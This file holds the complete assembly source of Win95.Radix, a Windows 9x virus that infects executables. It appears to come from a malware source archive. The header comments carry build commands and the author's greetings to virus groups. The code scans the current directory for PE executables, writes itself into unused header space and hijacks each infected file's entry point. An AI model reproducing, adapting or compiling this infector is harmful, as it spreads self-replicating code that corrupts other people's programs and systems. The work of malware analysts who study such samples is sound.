MalwareSourceCode/LegacyWindows/Win95.Radix.asm
2020-10-09 21:54:36 -05:00

239 lines
4.5 KiB
NASM

; Win95.Radix by Radix16[MIONS]
; Made in Czech republic
;
;Hi,
;
;It's my first Ring3 virus for Win9x.Virus not testing WinNT system.
;
;Target : PE filez
;Virus size : 405(402)
;Resident : NO
;Polymorhic : NO
;
;Virus not dangerous, but .....
;
;Decription AVP:
;
;http://www.avp.ch/avpve/newexe/win95/radix.stm
;
;It is a harmless nonmemory resident parasitic Win9x virus. It searches
;for PE EXE files in the current directory, then writes itself to the
;middle of the file, to not used space at the end of the PE header.
;
;The virus does not manifest itself in any way. It contains the text:
;
; Radix16
;Greets to :
; Worf[MIONS]
; VirusBuster/29
; Prizzy/29A
;
;
;How to build:
; tasm32 -ml -m5 radix.asm
; tlink32 -Tpe -aa -c -x radix.obj,,, import32
; pewrsec radix.exe
;
;Contacty mee : Radix16@atlas.cz
; Radix16.cjb.net
.386p
locals
.Model Flat,STDCALL
extrn ExitProcess :proc
extrn GetModuleHandleA : proc
.Data
db ?
.Code
vStart label byte
Start:
db 68h
;Save old eip
oldip: dd offset exit
pushad
Call Next
id db 'Radix16'
Next:
pop ebp
mov esi,KERNEL32+3ch
lodsd
add eax,KERNEL32
xchg eax,esi
mov esi,dword ptr [esi+78h]
lea esi,dword ptr [esi+1ch+KERNEL32]
lodsd
mov eax,dword ptr [eax+KERNEL32]
add eax,KERNEL32
push eax
push 20060000h
push 0h
push 1h
db 68h
currPage:
dd FSTGENPAGE
push 1000dh
call eax
pop dword ptr [_VxDCALL0+ebp-X]
inc eax
jz _exit
inc eax
;allocation memory
push 00020000h or 00040000h
push 2h
push 80060000h
push 00010000h
call dword ptr [_VxDCALL0+ebp-X]
mov dword ptr [memory+ebp-X],eax
push 00020000h or 00040000h or 80000000h or 8h
push 0h
push 1h
push 2h
shr eax,12
push eax
push 00010001h
call dword ptr [_VxDCALL0+ebp-X]
;Create DTA
mov ah,1ah
mov edx,dword ptr [memory+ebp-X] ;buffer
add edx,1000h
call int21
mov ah,4eh ;FindFirstFile
lea edx,[_exe+ebp-X] ;What search
xor ecx,ecx ;normal attributes
tryanother:
call int21
jc _exit ;is filez ?
call _infect
mov ah,4fh ;FindNextFile
Jmp tryanother
_exit:
popad
ret
_exe db '*.*',0 ;filez search
int21:
;VxDCALL services
push ecx
push eax
push 002a0010h
call dword ptr [_VxDCALL0+ebp-X]
ret
FP: ;Set file pointer
mov ah,42h
cdq ;xor dx,dx
xor cx,cx
call int21
ret
_infect:
mov edx,dword ptr [memory+ebp-X] ;Name file
add edx,101eh
mov ax,3d02h ;Open File R/W
call int21
jc quit ;Error ?
xchg eax,ebx ;FileHandle
mov ah,3fh ;Read File
mov ecx,1000h ;Read 1000h bytes
mov edx,dword ptr [memory+ebp-X]
call int21
jc quitz ;Error ?
mov edi,edx
cmp word ptr [edi],'ZM' ;Test Header (EXE)
jne quitz ;yes or no ?
cmp word ptr [edi+32h],'61' ;Test infection
je quitz ;Yes, virus is in file ?
mov word ptr [edi+32h],'61' ;No ,Save ID to file
add edi,dword ptr [edi+3ch] ;Testing Portable Executable(PE)
cmp word ptr [edi],'EP'
jne quitz
mov esi,edi
mov eax,18h ;Shift image header
add ax,word ptr [edi+14h]
add edi,eax
;Search end section
movzx cx,word ptr [esi+06h]
mov ax,28h
mul cx
add edi,eax
mov ecx,dword ptr [esi+2ch]
mov dword ptr [esi+54h],ecx
push edi
sub edi,dword ptr [memory+ebp-X]
xchg edi,dword ptr [esi+28h]
mov eax,dword ptr [esi+34h]
add edi,eax
shr eax,12
mov dword ptr [currPage+ebp-X],eax
mov dword ptr [oldip+ebp-X],edi ;Save old EIP
pop edi
mov ecx,VirusSize
lea esi,[vStart+ebp-X]
rep movsb ;CopyVirus
xor al,al ;SetFilePointer 0=beginning file
call FP ;mov al,0
mov ah,40h ;Write to file
mov ecx,1000h
mov edx,dword ptr [memory+ebp-X]
call int21
quitz:
mov ah,3eh ;CloseFile
call int21
quit:
ret
exit:
vEnd label byte
ret
VirusSize equ vEnd-vStart
KERNEL32 equ 0bff70000h ;Win9X kernel address
FSTGENPAGE equ 000400000h/1000h
X equ offset id
_VxDCALL0 dd ?
memory dd ? ;Buffer
Virual_End:
ends
End Start